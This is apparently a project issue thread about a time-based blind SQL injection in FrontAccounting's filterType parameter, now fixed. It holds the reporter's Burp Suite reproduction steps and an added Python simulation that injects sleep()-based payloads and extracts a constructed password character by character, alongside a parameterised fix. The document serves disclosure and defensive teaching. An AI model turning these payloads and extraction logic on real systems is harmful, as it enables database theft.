Time Based Blind SQL Injection in "filterType" Parameter #37
I cannot replicate the problem testing the current version on Ubuntu 16.04,
MySQL 5.5.62 and PHP 7.0.33.
What FA/MySQL/PHP version did you test on?
Did you find any other point where the vulnerability exists? The field
is sanitized in exactly the same manner as all other inputs in FA, so
if the problem really appears on some special server configuration, it
should appear in many places of the FA interface.
I'm using PHP 7.2.4, MariaDB 10.1.31 and XAMPP 3.2.2 on Windows 10 64-bit. Did you change the user_name_entry_field and password field according to your configuration? Can I know what you get?
I'm using FA v2.4.5 Build 06.12.2018.
Finally I reproduced the problem (the PoC didn't work as I overlooked that you marked the filterType POST parameter with asterisks). The problem has been fixed in the just-released 2.4.6 version.
Thank you.
Vulnerability Name: Time Based Blind SQL Injection in "filterType" Parameter
Vulnerability Description: The filterType parameter in the admin/attachments.php file suffers from blind SQL injection. By using this, an attacker can grab backend database information.
PoC:
Step 1: Open Burp Suite, go to the Repeater tab and paste the above contents.
Step 2: Click on the pen-like icon on the right side, configure your IP address and port, and click Save.
Step 3: Click on the "Go" button; you will see the response is delayed by 20 seconds.
Step 4: Change the value passed to the sleep function to whatever you want and click "Go"; you will see a delay equal to the value you gave the sleep function.
PoC Video:
Mitigation: See the OWASP SQL Injection Prevention Cheat Sheet at https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
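The report above only shows that a delay can be triggered; what a time-based blind injection actually buys the attacker is a one-bit oracle, and the "grab backend database information" claim follows from asking that oracle many times. The following is an added, self-contained simulation written for this page; it is not FrontAccounting code, not the reporter's PoC request (which is not reproduced here), and not the fix that shipped in 2.4.6. It stands in for the MySQL/MariaDB target with an in-memory SQLite database plus a registered `sleep()` function, so the payload uses SQLite's `unicode()`/`substr()` where a real MySQL payload would use `ASCII()`/`SUBSTRING()` and `SLEEP()`. The `attachments` and `users` tables, the `admin`/`s3cret` row, the query shapes in `vulnerable_query` and `safe_query`, and the scaled-down delay are all constructed assumptions. The delay is scaled to milliseconds so the whole extraction runs in well under a second.

```python
import sqlite3
import time

# Scaled-down delay: one unit of the injected sleep(n) costs DELAY_UNIT seconds
# in this simulation instead of n full seconds, so the demo finishes quickly.
DELAY_UNIT = 0.03
THRESHOLD = DELAY_UNIT / 2   # a probe slower than this is read as "condition true"


def make_db():
    """Constructed in-memory stand-in for the application database (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE attachments (id INTEGER, type_no INTEGER, description TEXT)")
    conn.execute("CREATE TABLE users (user_id TEXT, password TEXT)")
    conn.executemany("INSERT INTO attachments VALUES (?, ?, ?)",
                     [(1, 20, "invoice.pdf"), (2, 10, "order.pdf")])
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")   # constructed secret
    # Register sleep() so a MySQL-style time-delay payload executes inside SQLite.
    conn.create_function("sleep", 1, lambda n: time.sleep(n * DELAY_UNIT) or 0)
    return conn


def vulnerable_query(conn, filter_type):
    """Hypothetical pre-fix shape: the parameter is pasted straight into the SQL text."""
    sql = "SELECT id, description FROM attachments WHERE type_no=" + filter_type
    return conn.execute(sql).fetchall()


def safe_query(conn, filter_type):
    """Hardened shape: reject anything that is not an integer, then bind it."""
    type_no = int(filter_type)          # ValueError on the injection payload
    return conn.execute(
        "SELECT id, description FROM attachments WHERE type_no=?", (type_no,)
    ).fetchall()


def timing_oracle(conn, query_fn, condition):
    """One boolean probe: True iff the request takes noticeably longer than normal."""
    payload = f"20 AND (CASE WHEN ({condition}) THEN sleep(1) ELSE 0 END)"
    start = time.perf_counter()
    try:
        query_fn(conn, payload)
    except (sqlite3.Error, ValueError):
        pass                             # an error response is also "no delay"
    return time.perf_counter() - start > THRESHOLD


def extract_secret(conn, query_fn, max_len=32):
    """Recover the admin password one character at a time by binary search on its code."""
    target = "(SELECT password FROM users WHERE user_id='admin')"
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                    # 7 probes per character
            mid = (lo + hi) // 2
            cond = f"coalesce(unicode(substr({target},{pos},1)),0) > {mid}"
            if timing_oracle(conn, query_fn, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                       # substr past the end: string finished
            break
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_secret(db, vulnerable_query))
    print("hardened:  ", repr(extract_secret(db, safe_query)))
```

Against `vulnerable_query` the oracle recovers the full secret with about seven requests per character; against `safe_query` every probe fails fast and the extraction stops at the first character, which is the behaviour to confirm after patching: no delay for any value of the sleep argument, not just a different delay. The integer cast is appropriate only because the constructed `type_no` column is numeric; for a string-valued filter the check would be a whitelist of allowed values or prepared-statement binding without the cast.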